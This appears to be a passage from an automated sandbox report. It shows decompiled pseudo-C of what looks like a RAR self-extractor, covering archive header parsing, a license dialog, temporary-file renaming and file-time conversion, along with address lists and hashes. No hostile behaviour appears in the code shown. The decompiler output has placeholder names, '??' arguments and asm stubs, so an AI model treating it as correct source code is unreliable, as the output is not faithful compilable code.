											 *(_t240 + 0x2104) = E00D7C39E(_t315) & 0x00000001;
											_t331 = E00D7C39E(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E00D7C300(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E00D7B9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E00D81094();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E00D7C39E(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E00D7C39E(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E00D7C300(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E00D7C39E(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E00D7C300(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E00D7C39E(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E00D7C39E(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00D71EDE(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}





























































              0x00d72011
              0x00d72017
              0x00d7201e
              0x00d72022
              0x00d72027
              0x00d72031
              0x00d72688
              0x00d7268f
              0x00d7268f
              0x00d72037
              0x00d72039
              0x00d7203f
              0x00d72046
              0x00d7204f
              0x00d72051
              0x00d72056
              0x00d72058
              0x00d7205a
              0x00000000
              0x00000000
              0x00d7206d
              0x00d72070
              0x00d72072
              0x00000000
              0x00000000
              0x00d72078
              0x00d7207a
              0x00000000
              0x00d7208a
              0x00d7208a
              0x00d7208f
              0x00d72093
              0x00d72098
              0x00d7209b
              0x00d7209d
              0x00d7209f
              0x00d720a1
              0x00d720a5
              0x00d720a9
              0x00000000
              0x00d720b9
              0x00d720bd
              0x00d720ce
              0x00d720d2
              0x00d720d7
              0x00d720dd
              0x00d720e1
              0x00d720ea
              0x00d72102
              0x00d72104
              0x00d72107
              0x00d72107
              0x00d7210a
              0x00d7210a
              0x00d72110
              0x00d72114
              0x00d7211d
              0x00d72135
              0x00d72137
              0x00d7213a
              0x00d7213a
              0x00d7211d
              0x00d7213d
              0x00d72141
              0x00d72141
              0x00d72149
              0x00d72155
              0x00d72157
              0x00000000
              0x00d72168
              0x00d72168
              0x00d7216b
              0x00d7251a
              0x00d7251f
              0x00d72521
              0x00d72551
              0x00d7255f
              0x00d72567
              0x00d72572
              0x00d72575
              0x00d7257b
              0x00d7257e
              0x00d7258d
              0x00d72592
              0x00d72596
              0x00d7259a
              0x00d725a2
              0x00d725a2
              0x00d725b2
              0x00d725c2
              0x00d725c7
              0x00d725ce
              0x00d725d6
              0x00d725df
              0x00d725ed
              0x00d725f7
              0x00d72604
              0x00d7260d
              0x00d72613
              0x00d72624
              0x00d72629
              0x00d7262e
              0x00d72632
              0x00d72636
              0x00d7263c
              0x00d72646
              0x00d7264b
              0x00d7264e
              0x00d72650
              0x00d72652
              0x00d72652
              0x00d72650
              0x00d7263c
              0x00d72658
              0x00d7265f
              0x00d72669
              0x00d72523
              0x00d72530
              0x00d72535
              0x00d72539
              0x00d7253d
              0x00d72545
              0x00d72545
              0x00000000
              0x00d72521
              0x00d72171
              0x00d72174
              0x00d724f3
              0x00d724f8
              0x00d724fa
              0x00000000
              0x00000000
              0x00d72500
              0x00d72508
              0x00d72512
              0x00d721c9
              0x00d721cb
              0x00000000
              0x00d721cb
              0x00d7217a
              0x00d7217d
              0x00d72374
              0x00d72376
              0x00000000
              0x00000000
              0x00d7237c
              0x00d72387
              0x00d72389
              0x00d7238e
              0x00d72392
              0x00d72394
              0x00d7239a
              0x00d7239e
              0x00d7239e
              0x00d723a1
              0x00d723a5
              0x00d723a7
              0x00d723a9
              0x00d723ab
              0x00d723cf
              0x00d723ad
              0x00d723bb
              0x00d723bb
              0x00d723d4
              0x00d723d8
              0x00d723d8
              0x00d723dc
              0x00d723dc
              0x00d723df
              0x00d723e3
              0x00d723e5
              0x00d723e7
              0x00d723e9
              0x00d7240d
              0x00d723eb
              0x00d723f9
              0x00d723f9
              0x00d723e9
              0x00d72412
              0x00d72418
              0x00d72418
              0x00d7241b
              0x00d7241f
              0x00d72421
              0x00d72426
              0x00d72428
              0x00d7244c
              0x00d7242a
              0x00d72438
              0x00d72438
              0x00d72451
              0x00d72451
              0x00d72455
              0x00d7245a
              0x00d72460
              0x00d72462
              0x00d72468
              0x00d7246d
              0x00d72496
              0x00d7249b
              0x00d7246f
              0x00d72471
              0x00d72476
              0x00d7247b
              0x00d72480
              0x00d72482
              0x00d72484
              0x00d7248f
              0x00d7248f
              0x00d72484
              0x00d724a0
              0x00d724a5
              0x00d724ae
              0x00d724b0
              0x00d724b2
              0x00d724bd
              0x00d724bd
              0x00d724b2
              0x00d724c2
              0x00d724c7
              0x00d724d4
              0x00d724d6
              0x00d724d8
              0x00d724e7
              0x00d724e7
              0x00d724d8
              0x00d724c7
              0x00d72462
              0x00000000
              0x00d7245a
              0x00d7237e
              0x00d72381
              0x00000000
              0x00000000
              0x00000000
              0x00d72381
              0x00d72183
              0x00d72186
              0x00d72317
              0x00d72319
              0x00000000
              0x00000000
              0x00d7231f
              0x00d7232a
              0x00d7232c
              0x00d72338
              0x00d7233a
              0x00d7234a
              0x00d72354
              0x00d72359
              0x00d7236a
              0x00d7236a
              0x00000000
              0x00d7233a
              0x00d72321
              0x00d72324
              0x00000000
              0x00000000
              0x00000000
              0x00d72324
              0x00d7218c
              0x00d7218f
              0x00d722a2
              0x00d722b1
              0x00d722bc
              0x00d722be
              0x00d722c6
              0x00d722cc
              0x00d722d9
              0x00d722de
              0x00d722de
              0x00d722f4
              0x00d722f9
              0x00d72304
              0x00d7230c
              0x00d7230d
              0x00000000
              0x00d7230d
              0x00d72195
              0x00d72198
              0x00d721d7
              0x00d721de
              0x00d721e5
              0x00d721ee
              0x00d721fc
              0x00d72202
              0x00d72209
              0x00d7220d
              0x00d7220f
              0x00d72218
              0x00d7221f
              0x00d72221
              0x00d72223
              0x00d72223
              0x00d72229
              0x00d7222e
              0x00d72232
              0x00d72232
              0x00d72236
              0x00d72238
              0x00d72241
              0x00d72248
              0x00d7224a
              0x00d7224c
              0x00d7224c
              0x00d7224f
              0x00d72258
              0x00d7225d
              0x00d7225d
              0x00d72261
              0x00d72268
              0x00d72271
              0x00d72271
              0x00d72277
              0x00d7227e
              0x00d72287
              0x00d72287
              0x00d7228d
              0x00000000
              0x00d7228d
              0x00d7219d
              0x00000000
              0x00000000
              0x00d721a7
              0x00d721b5
              0x00d721b5
              0x00d721b8
              0x00d721c1
              0x00d721c6
              0x00d721c7
              0x00000000
              0x00d721c7
              0x00d72670
              0x00d72670
              0x00d72670
              0x00d72674
              0x00d7267a
              0x00d7267f
              0x00000000
              0x00000000
              0x00000000
              0x00d7267f
              0x00d72149
              0x00d720a9
              0x00d7207a
              0x00d72687

              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              • Opcode ID: b2c9c985dc7b416e1db656c5895ede9222dc9651da61acfc267fad7d4cec5cc1
              • Instruction ID: 0268084627d5743f3e80fe7a9e544f633df07b36d0122f5eede781e02523f343
              • Opcode Fuzzy Hash: b2c9c985dc7b416e1db656c5895ede9222dc9651da61acfc267fad7d4cec5cc1
              • Instruction Fuzzy Hash: 86F105716043805BDB24EF288895BBE7799EB94304F0CC56DFD8D9B287FA2499488772
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8A3E1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00D8A3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E00D712D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E00D8C343(__edx, __eflags, __fp0, _t35);
					_t9 =  *0xdbb704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0xdc5d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xdcde1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0xdadf40(0xf));
					 *0xdadf3c(_t35);
					_t31 =  *0xdb75ec; // 0x0
					E00D88FE6(_t31, __eflags,  *0xdb0064, _t38,  *0xdcde18, 0, 0);
					L00D92B4E( *0xdcde1c);
					L00D92B4E( *0xdcde18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}













              0x00d8a3e2
              0x00d8a3e8
              0x00d8a3ef
              0x00d8a408
              0x00d8a4ee
              0x00d8a4f0
              0x00000000
              0x00d8a4f0
              0x00d8a40e
              0x00d8a414
              0x00d8a441
              0x00d8a446
              0x00d8a451
              0x00d8a453
              0x00d8a45e
              0x00d8a45e
              0x00d8a460
              0x00d8a465
              0x00d8a467
              0x00d8a473
              0x00d8a473
              0x00d8a479
              0x00d8a47e
              0x00d8a480
              0x00d8a484
              0x00d8a484
              0x00d8a499
              0x00d8a4a1
              0x00d8a4b3
              0x00d8a4b6
              0x00d8a4bc
              0x00d8a4d1
              0x00d8a4dc
              0x00d8a4e7
              0x00000000
              0x00d8a4ed
              0x00d8a419
              0x00d8a428
              0x00000000
              0x00d8a428
              0x00d8a41e
              0x00d8a421
              0x00d8a43c
              0x00d8a430
              0x00d8a431
              0x00000000
              0x00d8a431
              0x00d8a426
              0x00d8a42f
              0x00000000
              0x00d8a42f
              0x00000000

              APIs
                • Part of subcall function 00D712D7: GetDlgItem.USER32(00000000,00003021), ref: 00D7131B
                • Part of subcall function 00D712D7: SetWindowTextW.USER32(00000000,00DA22E4), ref: 00D71331
              • EndDialog.USER32(?,00000001), ref: 00D8A431
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D8A45E
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D8A473
              • SetWindowTextW.USER32(?,?), ref: 00D8A484
              • GetDlgItem.USER32(?,00000065), ref: 00D8A48D
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D8A4A1
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D8A4B3
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              • Opcode ID: 62c9f75ebda21b0559254c6fc3167af9dc8f61a0fc0451cff3ee1f6bb37da31d
              • Instruction ID: a19250bdf17a790460a6d9fa108678ff4681154cd3151df65152848134f57523
              • Opcode Fuzzy Hash: 62c9f75ebda21b0559254c6fc3167af9dc8f61a0fc0451cff3ee1f6bb37da31d
              • Instruction Fuzzy Hash: F221E532204305BFEA116B2DEC89F7B7B6EEB46B44F044015F646E62A1CB96AC019732
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79268, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E00D79268(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E00D8D870(E00DA1336, _t85);
				E00D8D940();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E00D7B943(_t92, _t85 - 0x4030);
							_t78 = E00D7B943(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00D81410( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00D81410(E00D7B943(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E00D7FAB1(_t85 - 0x100c, _t83, 0x800);
											E00D73E41(E00D7B943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E00D79E6B(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00D7FAB1(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E00D7B9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E00D7943C(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E00D79E6B(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E00D79528(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E00D794DA(_t85 - 0x2030);
												E00D79621(_t85 - 0x2030);
											}
											E00D7946E(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}
















              0x00d7926d
              0x00d79277
              0x00d7927e
              0x00d79281
              0x00d79290
              0x00d79298
              0x00d79427
              0x00d79427
              0x00d79427
              0x00d792a6
              0x00d792af
              0x00d792b7
              0x00000000
              0x00d792bd
              0x00d792bd
              0x00d792bf
              0x00000000
              0x00d792c5
              0x00d792d1
              0x00d792e0
              0x00d792e2
              0x00d792e7
              0x00000000
              0x00d792ed
              0x00d792f1
              0x00d792f6
              0x00d792f8
              0x00000000
              0x00d792fe
              0x00d79306
              0x00d7930d
              0x00000000
              0x00d79313
              0x00d79313
              0x00d7931a
              0x00d7931c
              0x00d7931c
              0x00d7931f
              0x00000000
              0x00000000
              0x00d7932e
              0x00d7934b
              0x00d79350
              0x00d79361
              0x00d7936e
              0x00d79363
              0x00d79363
              0x00d79365
              0x00d79365
              0x00d79375
              0x00d7937e
              0x00000000
              0x00d79380
              0x00d79380
              0x00d79383
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d79383
              0x00000000
              0x00d7937e
              0x00d79397
              0x00d7939c
              0x00d793a7
              0x00d793c4
              0x00000000
              0x00d793c6
              0x00d793cc
              0x00d793d2
              0x00d793dc
              0x00d793de
              0x00d793e0
              0x00d793ec
              0x00d793ec
              0x00d793fc
              0x00d79400
              0x00d79408
              0x00d79413
              0x00d79413
              0x00d7941e
              0x00d79423
              0x00d79423
              0x00d793c4
              0x00d7930d
              0x00d792f8
              0x00d792e7
              0x00d792bf
              0x00d792b7
              0x00d79429
              0x00d7942f
              0x00d79439

              APIs
              • __EH_prolog.LIBCMT ref: 00D7926D
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D79290
              • GetShortPathNameW.KERNEL32 ref: 00D792AF
                • Part of subcall function 00D81410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7ACFE,?,?,?,00D7ACAD,?,-00000002,?,00000000,?), ref: 00D81426
              • _swprintf.LIBCMT ref: 00D7934B
                • Part of subcall function 00D73E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73E54
              • MoveFileW.KERNEL32(?,?), ref: 00D793C0
              • MoveFileW.KERNEL32(?,?), ref: 00D793FC
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              • Opcode ID: b231a5f75f201a9779d6e998066cfae22dbc6aee63b6974a65e7268588c952fd
              • Instruction ID: 951cce462a060a814be5049d6919459ec2cef070485355cbe16f2d217e46c1b0
              • Opcode Fuzzy Hash: b231a5f75f201a9779d6e998066cfae22dbc6aee63b6974a65e7268588c952fd
              • Instruction Fuzzy Hash: A2415A76911218A6DF20EBA08D54EEEA37CFF45385F0484A5B64CA3142FA349B45CB74
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D806E0, Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00D806E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E00D8DEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E00D7A995() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0xdad084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E00D80849(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E00D8DF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}




















              0x00d806e0
              0x00d806e7
              0x00d806f8
              0x00d806fc
              0x00d80710
              0x00d8072e
              0x00d8073b
              0x00d80751
              0x00d8075d
              0x00d8076b
              0x00d80773
              0x00d80779
              0x00d8077f
              0x00d80783
              0x00d80785
              0x00d80712
              0x00d8071c
              0x00d8071c
              0x00d80793
              0x00d80795
              0x00d807a0
              0x00d807a1
              0x00d807a6
              0x00d807ab
              0x00d807b0
              0x00d807b8
              0x00d807c0
              0x00d807c8
              0x00d807ce
              0x00d807d0
              0x00d807d3
              0x00d807d6
              0x00d807db
              0x00d807df
              0x00d807e4
              0x00d807e5
              0x00d807ec
              0x00d807ef
              0x00d807f2
              0x00d807f5
              0x00d807f8
              0x00000000
              0x00000000
              0x00000000
              0x00d807f8
              0x00d807fa
              0x00d807fa
              0x00d80802
              0x00d8080e
              0x00d8080e
              0x00d8081d
              0x00d80823
              0x00d8082c

              APIs
              • __aulldiv.LIBCMT ref: 00D806F3
                • Part of subcall function 00D7A995: GetVersionExW.KERNEL32(?), ref: 00D7A9BA
              • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00D8071C
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00D8072E
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D8073B
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D80751
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D8075D
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D80793
              • __aullrem.LIBCMT ref: 00D8081D
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              • Opcode ID: a64d1b4787bb87bb394d53617f14f6f5404cd88dcb3d4e500fd528ef0b79e028
              • Instruction ID: b8b66e0d0dc5726f0c5198936af5fd85864bba6afb798548811860feabcfa676
              • Opcode Fuzzy Hash: a64d1b4787bb87bb394d53617f14f6f5404cd88dcb3d4e500fd528ef0b79e028
              • Instruction Fuzzy Hash: 76412BB24083059FC750EF69C88096BFBF9FF88714F044A2EF69692650E735E548CB66
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9E2ED, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00D9E2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xdd0420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xdd0420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00D99474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xdd0420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xdd0420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xdd0420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00D9804C( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00D9804C();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
